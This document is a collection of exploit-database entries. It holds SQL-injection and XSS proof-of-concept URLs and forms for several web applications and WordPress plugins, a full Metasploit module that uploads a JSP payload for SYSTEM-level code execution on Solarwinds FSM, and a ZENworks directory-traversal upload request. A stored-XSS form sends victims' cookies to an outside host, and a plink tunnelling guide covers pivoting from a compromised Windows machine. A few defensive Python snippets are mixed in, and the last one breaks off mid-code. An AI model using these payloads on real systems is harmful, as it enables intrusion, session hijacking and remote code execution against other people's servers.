source: https://www.securityfocus.com/bid/52086/info

TestLink is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

http://www.example.com/lib/ajax/getrequirementnodes.php?root_node=1 OR 1=1
http://www.example.com/lib/ajax/gettprojectnodes.php?root_node=4 OR 1=1
http://www.example.com/lib/cfields/cfieldsEdit.php?do_action=edit&cfield_id=1 AND 3653=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/plan/planMilestonesEdit.php?doAction=edit&id=7 AND 5912=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/plan/planMilestonesEdit.php?doAction=create&tplan_id=2623 AND 5912=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/requirements/reqEdit.php?doAction=create&req_spec_id=2622 AND 5912=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/requirements/reqImport.php?req_spec_id=2622 AND 5912=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/requirements/reqSpecAnalyse.php?req_spec_id=2622 OR 1=1
http://www.example.com/lib/requirements/reqSpecPrint.php?req_spec_id=2622 AND 5912=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/requirements/reqSpecView.php?req_spec_id=2622 AND 5912=BENCHMARK(5000000,MD5(1))

source: https://www.securityfocus.com/bid/52085/info

F*EX is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible. 

http://www.example.com/fup [id parameter]
http://www.example.com/fup [to parameter]
http://www.example.com/fup [from parameter] 
            
source: https://www.securityfocus.com/bid/51882/info

Simple Groupware is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Simple Groupware 0.742 is vulnerable; other versions may also be affected. 

http://www.example.com/SimpleGroupware_0.742/bin/index.php?export=<ScRiPt >alert('xss')</ScRiPt>
            
source: https://www.securityfocus.com/bid/51952/info

PHP is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to cause the web server to crash, denying service to legitimate users.

PHP 5.3.8 is vulnerable; other versions may also be affected. 

<?php
// PoC: a row fetched with PDO::FETCH_LAZY is a PDORow object; storing it in
// $_SESSION makes PHP serialize it at request shutdown, which triggers the
// crash described above on PHP 5.3.8.
// The DSN and credentials are placeholders; any reachable MySQL database and
// any statement that returns a row will do.
$pdo  = new PDO('mysql:host=localhost;dbname=test', 'user', 'password');
$stmt = $pdo->query('SELECT 1');

$result = $stmt->fetch(PDO::FETCH_LAZY);

session_start();

$_SESSION['PDORow'] = $result;
?> 
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability",
      'Description'    => %q{
        This module exploits multiple vulnerabilities found in Solarwinds Firewall Security Manager
        6.6.5. The first vulnerability is an authentication bypass via the Change Advisor interface
        due to a user-controlled session.putValue API in userlogin.jsp, allowing the attacker to set
        the 'username' attribute before authentication. The second problem is that the settings-new.jsp
        file will only check the 'username' attribute before authorizing the 'uploadFile' action,
        which can be exploited and allows the attacker to upload a fake xls host list file to the
        server, and results in arbitrary code execution under the context of SYSTEM.

        Depending on the installation, by default the Change Advisor web server is listening on port
        48080 for an express install. Otherwise, this service may appear on port 8080.

        Solarwinds has released a fix for this vulnerability as FSM-v6.6.5-HotFix1.zip. You may
        download it from the module's References section.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'rgod',  # Original discovery
          'mr_me <steventhomasseeley[at]gmail.com>', # https://twitter.com/ae0n_
          'sinn3r' # Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2015-2284'],
          ['OSVDB', '81634'],
          ['ZDI', '15-107'],
          ['URL', 'http://downloads.solarwinds.com/solarwinds/Release/HotFix/FSM-v6.6.5-HotFix1.zip']
        ],
      'DefaultOptions'  =>
        {
          'RPORT'    => 48080 # Could be 8080 too
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Solarwinds Firewall Security Manager 6.6.5', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 13 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Base FMS directory path', '/'])
      ], self.class)
  end


  # Returns a checkcode that indicates whether the target is FSM or not
  def check
    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'fsm', 'login.jsp'))

    if res && res.body =~ /SolarWinds FSM Change Advisor/i
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end


  # Exploit/run command
  def exploit
    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::NotVulnerable, 'Target does not appear to be a Solarwinds Firewall Security Manager')
    end

    # Stage 1 of the attack
    # 'admin' is there by default and you can't delete it
    username = 'admin'
    print_status("Auth bypass: Putting session value: username=#{username}")
    sid = put_session_value(username)
    print_status("Your SID is: #{sid}")

    # Stage 2 of the attack
    exe = generate_payload_exe(code: payload.encoded)
    filename = "#{Rex::Text.rand_text_alpha(5)}.jsp"
    # Because when we get a shell, we will be at:
    # C:\Program Files\SolarWinds\SolarWinds FSMServer\webservice
    # So we have to adjust this filename in order to delete the file
    register_files_for_cleanup("../plugins/com.lisletech.athena.http.servlets_1.2/jsp/#{filename}")
    malicious_file = get_jsp_payload(exe, filename)
    print_status("Uploading file: #{filename} (#{exe.length} bytes)")
    upload_exec(sid, filename, malicious_file)
  end


  private


  # Returns a write-stager
  # I grabbed this from Juan's sonicwall_gms_uploaded.rb module
  def jsp_drop_bin(bin_data, output_file)
    jspraw =  %Q|<%@ page import="java.io.*" %>\n|
    jspraw << %Q|<%\n|
    jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|

    jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|

    jspraw << %Q|int numbytes = data.length();\n|

    jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
    jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
    jspraw << %Q|{\n|
    jspraw << %Q|  char char1 = (char) data.charAt(counter);\n|
    jspraw << %Q|  char char2 = (char) data.charAt(counter + 1);\n|
    jspraw << %Q|  int comb = Character.digit(char1, 16) & 0xff;\n|
    jspraw << %Q|  comb <<= 4;\n|
    jspraw << %Q|  comb += Character.digit(char2, 16) & 0xff;\n|
    jspraw << %Q|  bytes[counter/2] = (byte)comb;\n|
    jspraw << %Q|}\n|

    jspraw << %Q|outputstream.write(bytes);\n|
    jspraw << %Q|outputstream.close();\n|
    jspraw << %Q|%>\n|

    jspraw
  end

  # Returns JSP that executes stuff
  # This is also from Juan's sonicwall_gms_uploaded.rb module
  def jsp_execute_command(command)
    jspraw =  %Q|<%@ page import="java.io.*" %>\n|
    jspraw << %Q|<%\n|
    jspraw << %Q|try {\n|
    jspraw << %Q|  Runtime.getRuntime().exec("chmod +x #{command}");\n|
    jspraw << %Q|} catch (IOException ioe) { }\n|
    jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
    jspraw << %Q|%>\n|

    jspraw
  end


  # Returns a JSP payload
  def get_jsp_payload(exe, output_file)
    jsp_drop_bin(exe, output_file) + jsp_execute_command(output_file)
  end


  # Creates an arbitrary username by abusing the server's unsafe use of session.putValue
  def put_session_value(value)
    res = send_request_cgi(
      'uri'      => normalize_uri(target_uri.path, 'fsm', 'userlogin.jsp'),
      'method'   => 'GET',
      'vars_get' => { 'username' => value }
    )

    unless res
      fail_with(Failure::Unknown, 'The connection timed out while setting the session value.')
    end

    get_sid(res)
  end


  # Returns the session ID
  def get_sid(res)
    cookies = res.get_cookies
    sid = cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || ''
    sid
  end


  # Uploads a malicious file and then execute it
  def upload_exec(sid, filename, malicious_file)
    res = upload_file(sid, filename, malicious_file)

    if !res
      fail_with(Failure::Unknown, 'The connection timed out while uploading the malicious file.')
    elsif res.body.include?('java.lang.NoClassDefFoundError')
      print_status('Payload being treated as XLS, indicates a successful upload.')
    else
      print_status('Unsure of a successful upload.')
    end

    print_status('Attempting to execute the payload.')
    exec_file(sid, filename)
  end


  # Uploads a malicious file
  # By default, the file will be saved at the following location:
  # C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\reports\tickets\
  def upload_file(sid, filename, malicious_file)
    # Put our payload in:
    # C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\jsp\
    filename = "../../jsp/#{filename}"

    mime_data = Rex::MIME::Message.new
    mime_data.add_part(malicious_file, 'application/vnd.ms-excel', nil, "name=\"file\"; filename=\"#{filename}\"")
    mime_data.add_part('uploadFile', nil, nil, 'name="action"')

    proto = ssl ? 'https' : 'http'
    ref = "#{proto}://#{rhost}:#{rport}#{normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp')}"

    send_request_cgi(
      'uri'      => normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp'),
      'method'   => 'POST',
      'vars_get' => { 'action' => 'uploadFile' },
      'ctype'    => "multipart/form-data; boundary=#{mime_data.bound}",
      'data'     => mime_data.to_s,
      'cookie'   => sid,
      'headers'  => { 'Referer' => ref }
    )
  end


  # Executes the malicious file and get code execution
  # We will be at this location:
  # C:\Program Files\SolarWinds\SolarWinds FSMServer\webservice
  def exec_file(sid, filename)
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'fsm', filename)
    )
  end


  # Overrides the original print_status so we make sure we print the rhost and port
  def print_status(msg)
    super("#{rhost}:#{rport} - #{msg}")
  end

end
            
>> Remote code execution in Novell ZENworks Configuration Management 11.3.1
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 07/04/2015 / Last updated: 07/04/2015

>> Background on the affected product:
"Automate and accelerate your Windows 7 migration
Microsoft estimates that it can take more than 20 hours to migrate a
single machine to Windows 7. Novell ZENworks Configuration Management
is ready to dramatically accelerate and automate every aspect of your
Windows 7 migration efforts.

Boost user productivity
Use Novell ZENworks Configuration Management to make sure users always
have access to the resources they need regardless of where they work
or what devices they use.

Eliminate IT effort
Automatically enforce policies and dynamically manage resources with
identity-based management of users as well as devices.

Expand your freedom to choose
Manage the lifecycles of all your current and future assets, with full
support for Windows and Linux systems, Novell eDirectory, Active
Directory, and more.

Simplify deployment with virtual appliances
Slash deployment times with a convenient virtual appliance deployment option.

Enjoy a truly unified solution
Centralize the management of all your devices into a single, unified
and easy-to-use web-based ZENworks console—called ZENworks Control
Center."

This vulnerability is present in ZENworks Configuration Management
(ZCM) which is part of the ZENworks Suite.
A blast from the past? This is a similar vulnerability to ZDI-10-078 /
OSVDB-63412, but it abuses a different parameter of the same servlet.
However this time Novell:
- Did not bother issuing a security advisory to their customers.
- Did not credit me even though I did responsible disclosure.
- Refused to provide a CVE number for months.
- Did not update their ZENworks Suite Trial software with the fix (you
can download it now from their site, install and test the PoC /
Metasploit module).
- Does not list the fix in the ZCM 11.3.2 update information
(https://www.novell.com/support/kb/doc.php?id=7015776).


>> Technical details:
Vulnerability: Remote code execution via file upload and directory traversal
CVE-2015-0779
Constraints: none; no authentication or any other information needed
Affected versions: ZENworks Configuration Management 11.3.1 and below

POST /zenworks/UploadServlet?uid=../../../opt/novell/zenworks/share/tomcat/webapps/&filename=payload.war
<WAR file payload in the body>

The WAR file will be automatically deployed to the server (on certain
Windows and Linux installations the path can be "../webapps/"). A
Metasploit module that exploits this vulnerability has been released.
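As an added illustration (not part of the advisory or of Novell's code), the following Python shows why the uid value above is dangerous: joined naively with the filename it resolves outside the upload directory, and a containment check on the resolved path rejects it. The upload root /srv/zenworks/uploads is a constructed value; the advisory does not state the real directory.

```python
import posixpath
from pathlib import PurePosixPath

# Upload root the servlet is imagined to write under. Constructed for this
# example; the advisory does not state the real directory.
UPLOAD_ROOT = "/srv/zenworks/uploads"

# The uid value from the advisory's request, verbatim.
ATTACK_UID = "../../../opt/novell/zenworks/share/tomcat/webapps/"


def resolve_target(base: str, uid: str, filename: str) -> str:
    """Join base/uid/filename the way a naive servlet would, then normalise."""
    return posixpath.normpath(posixpath.join(base, uid, filename))


def is_contained(base: str, target: str) -> bool:
    """True only when target equals base or lies beneath it after normalisation."""
    try:
        PurePosixPath(target).relative_to(posixpath.normpath(base))
    except ValueError:
        return False
    return True


def traversal_escapes(base: str = UPLOAD_ROOT, uid: str = ATTACK_UID,
                      filename: str = "payload.war") -> bool:
    """Does the unchecked join land outside the upload root?"""
    return not is_contained(base, resolve_target(base, uid, filename))


def safe_upload_path(base: str, uid: str, filename: str) -> str:
    """Hardened version: each component must be a single plain path segment,
    and the resolved path must still be inside the upload root."""
    for part in (uid, filename):
        if not part or part in (".", "..") or any(c in part for c in "/\\\0"):
            raise ValueError(f"rejected path component: {part!r}")
    target = resolve_target(base, uid, filename)
    if not is_contained(base, target):
        raise ValueError(f"path escapes upload root: {target}")
    return target


def rejects(base: str, uid: str, filename: str) -> bool:
    """Convenience wrapper: True when safe_upload_path refuses the input."""
    try:
        safe_upload_path(base, uid, filename)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("naive join resolves to:", resolve_target(UPLOAD_ROOT, ATTACK_UID, "payload.war"))
    print("escapes upload root:", traversal_escapes())
    print("hardened check rejects it:", rejects(UPLOAD_ROOT, ATTACK_UID, "payload.war"))
```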


>> Fix:
Upgrade to version ZENworks Configuration Management 11.3.2.


[1]: https://github.com/pedrib/PoC/blob/master/generic/zenworks_zcm_rce.txt
[2]: https://github.com/rapid7/metasploit-framework/pull/5096
            

Plink.exe is the command-line version of the PuTTY SSH client. Recent Windows versions already ship an SSH client, so plink is not very useful there; it is, however, useful on older systems that do not have that SSH client.

The plink binary can usually be found at the path:

/usr/share/windows-resources/binaries/plink.exe

Otherwise, it can be downloaded from the official PuTTY website.

Since plink.exe is an SSH client, the only thing we can do with it is Remote Port Forwarding. The SSH post already discussed the danger of this: essentially you are writing your own machine's credentials on a machine that is not yours, so care is needed (asymmetric keys can also be used).

The command for using plink.exe is the following:

cmd.exe /c echo y | plink.exe -l <usuario> -pw <contraseña> <ip mia de atacante> -R <puerto que abrimos en mi maquina atacante>:<host de quien queremos tunelizar>:<puerto que queremos tunelizar>

We would transfer plink to the Windows machine and run the command from there.

The first part of the command, cmd.exe /c echo y, is there so that in non-interactive shells (which most reverse shells on Windows systems are) the warning prompt plink shows by default can be accepted.

Otherwise, the rest of the command is easy to understand if you have already worked with Remote Port Forwarding; if not, I recommend reading the Pivoting with SSH post.

Besides this, some useful parameters we can add to plink are the following:

  • -g –> lets other clients on the LAN connect to the port opened on the attacking machine. By default it is only reachable locally.
  • -f –> plink goes to the background once the SSH session has been established successfully.
  • -N –> tells it not to run a shell, just to connect (this does not mean the process is sent to the background); that is, it would look like this:

It is quite advisable to use the -f and -N parameters.

-i –> lets you specify a private key. However, a conversion is needed, because plink will not understand the default format produced by ssh-keygen. Once we have generated the private key with ssh-keygen, we follow these steps:

Install the PuTTY tools:

sudo apt install putty-tools

Once installed, use puttygen:

puttygen <clave privada> -o <nueva clave privada>.ppk

This way, plink will understand the new private key and we can use it.

With all this explained, let's run a test in the following lab:

  • 3 machines
    • Kali
      • IP: 192.168.10.10
    • Windows 7
      • IP: 192.168.10.40 and 192.168.20.40 –> 2 network interfaces
    • Debian –> Web and SSH server – ports 22 and 80 enabled
      • IP: 192.168.20.20

NOTE: for the Remote Port Forwarding, I recommend making a simple password change in passwd.

For anyone unfamiliar with this, you can basically generate a UNIX DES password with openssl:

If we take this generated password and put it in passwd in place of the «x», the user's password will be the one we set in openssl, in this case «hola»; when you want to go back to the previous password, simply remove what was written in passwd and put the «x» back.

With this done, we go to the Windows machine and use plink as indicated in the command written previously:

cmd.exe /c echo y | plink.exe -l <usuario> -pw <contraseña> <ip mia de atacante> -R <puerto que abrimos en mi maquina atacante>:<host de quien queremos tunelizar>:<puerto que queremos tunelizar>

If we look closely, there are two important points here:

  1. We can tunnel as many ports as we want, always using the -R parameter.
  2. When tunnelling an SSH port, we have to specify a port to use/open on our machine other than 22, since that one is already in use.

This way, we now have both ports tunnelled, in this case 22 (2222 on our machine) and 80:

Plink is a tool that will gradually fall into disuse thanks to the default SSH client implementation on Windows systems. However, on certain occasions when we are dealing with some old system or other, it can come in quite handy.

# Exploit Title: Wordpress plugin 'Traffic Analyzer' Blind SQL Injection
# Google Dork: inurl:/plugins/trafficanalyzer/js/
# Date: 4/7/2015
# Exploit Author: Dan King (@fuzztester)
# Vendor Homepage: http://wptrafficanalyzer.in/
# Software Link: https://wordpress.org/plugins/trafficanalyzer/
# Version: 3.4.2
# Tested on: Ubuntu 14.10 with Mysql and Wordpress 4.11

[+] Issue [+]

The Wordpress plugin "Traffic Analyzer" is affected by a blind SQL injection vulnerability. The application does not properly validate the value of the "Referer" HTTP header.

[+] Impact [+]

This vulnerability would allow a remote attacker to access the database with the privileges configured by Wordpress. This could also lead to the attacker gaining remote access to the web server's filesystem and further compromising the system hosting the Wordpress installation.

[+] Details [+]

The following section of PHP code is where the vulnerability exists. The $sql variable is a concatenated string intended to be used to insert data into the database. The variable $referer is not checked for malicious data.

From 'class-TrafficAnalyzer.php' line number 297:

######################################################################################
$sql = " insert into $wpdb->prefix"."tanalyzer_pre ( hid,ip, script_name, user_agent, request_uri,resource_type,browser,resource,http_referer,wpta_cookie ) values ".
                                        " ('".$hid."'," .
                                        " '".$_SERVER["REMOTE_ADDR"]."', ".
                                        "'".$_SERVER['SCRIPT_NAME']."', " .
                                        " '".$_SERVER["HTTP_USER_AGENT"]."', ".
                                        " '". $_SERVER['REQUEST_URI']. "', ".
                                        " '".$resource_type."', " .
                                        " '".$browser."', " .
                                        " '".$resource ."', " .
                                        " '".$referer . "', " .
                                        " '".$this->wpta_cookie . "'" .
                                        " )";
###########################################################################################


[+] Proof of Concept [+]

Sending the following HTTP request to a vulnerable site will cause the request to be delayed for 30 seconds.

GET /[wordpress path]/ HTTP/1.1
Host: x.x.x.x
Referer: BLAH'||(SELECT 'Fdsf' FROM DUAL WHERE 5435=5435 and SLEEP(30) )||'
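As an added example (not from this advisory), a small Python log scanner that flags the request shapes shown in this PoC and in the TestLink entry above: BENCHMARK()/SLEEP() timing payloads and OR 1=1 tautologies, whether they arrive in the query string or in the Referer header. The log lines are constructed in the Apache combined log format with invented hosts; the payloads are the ones quoted on this page.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in combined log format. Hosts and timestamps are
# invented; the payloads are the TestLink and Traffic Analyzer ones above.
SAMPLE_LOG = r"""10.0.0.5 - - [10/Apr/2015:12:00:01 +0000] "GET /lib/ajax/getrequirementnodes.php?root_node=1%20OR%201=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Apr/2015:12:00:02 +0000] "GET /lib/cfields/cfieldsEdit.php?do_action=edit&cfield_id=1%20AND%203653=BENCHMARK(5000000,MD5(1)) HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Apr/2015:12:00:03 +0000] "GET /blog/ HTTP/1.1" 200 7331 "BLAH'||(SELECT 'Fdsf' FROM DUAL WHERE 5435=5435 and SLEEP(30) )||'" "Mozilla/5.0"
10.0.0.7 - - [10/Apr/2015:12:00:04 +0000] "GET /lib/plan/planMilestonesEdit.php?doAction=edit&id=7 HTTP/1.1" 200 1024 "http://intranet.example/lib/plan/" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Signatures for the payload shapes seen in the advisories on this page.
SIGNATURES = [
    ("mysql-benchmark", re.compile(r"\bBENCHMARK\s*\(", re.I)),
    ("mysql-sleep", re.compile(r"\bSLEEP\s*\(", re.I)),
    ("boolean-tautology", re.compile(r"\b(?:OR|AND)\s+\d+\s*=\s*\d+", re.I)),
    ("string-concat-escape", re.compile(r"'\s*\|\|\s*\(")),
]


def parse_line(line: str):
    """Return the log fields as a dict, or None for a line that does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_fields(rec: dict):
    """Return (field, signature) pairs for every field that matches a signature.

    Both the query string and the Referer are URL-decoded first, because the
    TestLink payloads arrive percent-encoded while the Referer payload does not.
    """
    hits = []
    query = rec["path"].partition("?")[2]
    for field, raw in (("query", query), ("referer", rec["referer"])):
        if not raw or raw == "-":
            continue
        decoded = unquote_plus(raw)
        for name, pattern in SIGNATURES:
            if pattern.search(decoded):
                hits.append((field, name))
    return hits


def scan(log_text: str):
    """Scan a whole log and return (line_no, ip, field, signature) findings."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        for field, sig in suspicious_fields(rec):
            findings.append((lineno, rec["ip"], field, sig))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print("line %d from %s: %s matched %s" % finding)
```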
            

Balero CMS v0.7.2 Multiple Blind SQL Injection Vulnerabilities

Vendor: BaleroCMS Software
Product web page: http://www.balerocms.com
Affected version: 0.7.2

Summary: Balero CMS is an open source project that can help you manage
the page of your company with just a few guided steps, minimizing the
costs that many companies make to have your advertising medium and/or
portal.

Desc: The application suffers from multiple blind SQL injection vulnerabilities
when input is passed to several POST parameters through their affected modules
which are not properly sanitised before being returned to the user or used
in SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.

Vulnerable POST parameters in affected modules:
-----------------------------------------------
- pages         [admin]
- themes        [admin]
- code          [mod-languages]
- id            [mod-blog, mod-virtual_page]
- title         [mod-blog]
- a             [mod-virtual_page]
- virtual_title [mod-virtual_page]
-----------------------------------------------

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5238
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5238.php


04.03.2015

--


csrf+bsqli poc:

<html>
  <body>
    <form action="http://localhost/balerocms/admin/edit_page/mod-virtual_page/id-11" method="POST">
      <input type="hidden" name="virtual_title" value="ZSL" />
      <input type="hidden" name="a" value="1" />
      <input type="hidden" name="content" value="Testingus" />
      <input type="hidden" name="_wysihtml5_mode" value="1" />
      <input type="hidden" name="id" value="11' and benchmark (50000000,sha1(1))-- " />
      <input type="hidden" name="submit_delete" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
            
<!--

Balero CMS v0.7.2 Multiple JS/HTML Injection Vulnerabilities

Vendor: BaleroCMS Software
Product web page: http://www.balerocms.com
Affected version: 0.7.2

Summary: Balero CMS is an open source project that can help you manage
the page of your company with just a few guided steps, minimizing the
costs that many companies make to have your advertising medium and/or
portal.

Desc: Input passed to the 'content' POST parameter and the cookie 'counter'
is not properly sanitised before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in context of an affected site.

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5239
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5239.php


04.03.2015

-->


<html>
  <body>
    <script>
      document.cookie="counter=1<script>confirm('XSS')</script>; path=/balerocms/";
    </script>
  </body>
</html>


csrf+stored xss+filter bypass+session hijack:

<html>
  <body>
    <form action="http://localhost/balerocms/admin/edit_delete_post/mod-blog" method="POST">
      <input type="hidden" name="title" value="ZSL" />
      <input type="hidden" name="content" value="pwned&lt;/textarea&gt;<s\cript>document.location="http://www.zeroscience.mk/pentest/cthief.php?cookie="+docu\ment.cookie;</s\cript>" />
      <input type="hidden" name="files" value="joxy.poxy" />
      <input type="hidden" name="delete_post[]" value="135" />
      <input type="hidden" name="id" value="135" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
            
# Exploit Title: Shareaholic 7.6.0.3 XSS
# Date: 10-11-2014
# Software Link: https://wordpress.org/plugins/shareaholic/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9311
# Category: webapps

1. Description

ShareaholicAdmin::add_location is accessible to every registered user.

File: shareaholic\shareaholic.php

add_action('wp_ajax_shareaholic_add_location',  array('ShareaholicAdmin', 'add_location'));


$_POST['location'] is not escaped.

File: shareaholic\admin.php

public static function add_location() {
	$location = $_POST['location'];
	$app_name = $location['app_name'];
	ShareaholicUtilities::update_options(array(
	  'location_name_ids' => array(
	    $app_name => array(
	      $location['name'] => $location['id']
	    ),
	  ),
	  $app_name => array(
	    $location['name'] => 'on'
	  )
	));

	echo json_encode(array(
	  'status' => "successfully created a new {$location['app_name']} location",
	  'id' => $location['id']
	));

	die();
}

http://security.szurek.pl/shareaholic-7603-xss.html

2. Proof of Concept

Log in as a regular user (created using wp-login.php?action=register), then:

<form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="shareaholic_add_location">
    <input type="hidden" name="location[app_name]" value="recommendations">
    <input type="hidden" name="location[name]" value="post_below_content">
    XSS: <input type="text" name="location[id]" value="'><script>alert(String.fromCharCode(88,83,83));</script>">
    <input type="submit" value="Hack!">
</form>

XSS will be visible for admin:

http://wordpress-install/wp-admin/admin.php?page=shareaholic-settings
  
3. Solution:
  
Update to version 7.6.1.0
https://downloads.wordpress.org/plugin/shareaholic.7.6.1.0.zip
https://blog.shareaholic.com/security-update-shareaholic-wordpress-plugin/
            
######################

# Exploit Title : WordPress All In One WP Security & Firewall 3.9.0 SQL Injection Vulnerability

# Exploit Author : Claudio Viviani

# Vendor Homepage : https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/

# Software Link : https://mega.co.nz/#!DJAEBLBS!IBiukGo-pirelHmsRV80xZDHIvpqZKtTIqsD8YrMf7U

# Date : 2015-04-05

# Tested on : Linux / Mozilla Firefox
 
######################

# Description

 WordPress All In One WP Security & Firewall 3.9.0 suffers from a blind SQL injection vulnerability.
 
 Several pages use the WordPress esc_sql function on the orderby and order parameters.
 esc_sql is prone to blind SQL injection in this position (discovered by Ryan Dewhurst - http://dewhurstsecurity.com/)
 
 isset($_GET["orderby"]) ? $orderby = strip_tags($_GET["orderby"]): $orderby = '';
 isset($_GET["order"]) ? $order = strip_tags($_GET["order"]): $order = '';
 
 - admin/wp-security-list-404.php
 
 $orderby = !empty($orderby) ? esc_sql($orderby) : 'id';
 $order = !empty($order) ? esc_sql($order) : 'DESC';
 ...
 ...
 $data = $wpdb->get_results("SELECT * FROM $events_table_name ORDER BY $orderby $order", ARRAY_A);
 
 
 - admin/wp-security-list-login-fails.php
 
 $orderby = !empty($orderby) ? esc_sql($orderby) : 'failed_login_date';
 $order = !empty($order) ? esc_sql($order) : 'DESC';
 
 $data = $wpdb->get_results("SELECT * FROM $failed_logins_table_name ORDER BY $orderby $order", ARRAY_A);
 
 
 - admin/wp-security-list-acct-activity-php
 
 $orderby = !empty($orderby) ? esc_sql($orderby) : 'login_date';
 $order = !empty($order) ? esc_sql($order) : 'DESC';
 
 $data = $wpdb->get_results("SELECT * FROM $login_activity_table ORDER BY $orderby $order LIMIT 50", ARRAY_A);
 
 
 - admin/wp-security-list-locked-ip.php
 
 $orderby = !empty($orderby) ? esc_sql($orderby) : 'failed_login_date';
 $order = !empty($order) ? esc_sql($order) : 'DESC';
 
 $data = $wpdb->get_results("SELECT * FROM $lockdown_table_name WHERE release_date > now() ORDER BY $orderby $order", ARRAY_A);

######################

# PoC

 http://VICTIM//wp-admin/admin.php?page=aiowpsec&tab=tab3&orderby=user_id,(select * from (select(sleep(30)))a)&order=asc
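As an added example (not the plugin's code), the Python below emulates what esc_sql does to the orderby value from this PoC and contrasts it with an allowlist check, which is the appropriate control for an ORDER BY position that takes identifiers rather than string literals. The escaping routine mimics mysqli_real_escape_string, which esc_sql ultimately calls; the allowed column names are constructed for the example.

```python
import re

# Characters that mysqli_real_escape_string() backslash-escapes. WordPress's
# esc_sql() ultimately calls that function, so this emulation (written for the
# example, not taken from WordPress) shows what the plugin's code does to input.
_ESCAPES = {
    "\0": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
    "'": "\\'", '"': '\\"', "\x1a": "\\Z",
}


def esc_sql_emulated(value: str) -> str:
    """Escape string delimiters and nothing else, as esc_sql() does."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


# The orderby value from the PoC above, verbatim.
PAYLOAD = "user_id,(select * from (select(sleep(30)))a)"


def escaping_leaves_payload_intact(payload: str = PAYLOAD) -> bool:
    """The payload contains no quote-like characters, so esc_sql() returns it
    unchanged and it is spliced into ORDER BY as SQL, not as a string."""
    return esc_sql_emulated(payload) == payload


# Hardened alternative: ORDER BY takes identifiers, so validate against an
# allowlist instead of escaping. The column names are constructed for the
# example; the advisory does not list the plugin's real columns.
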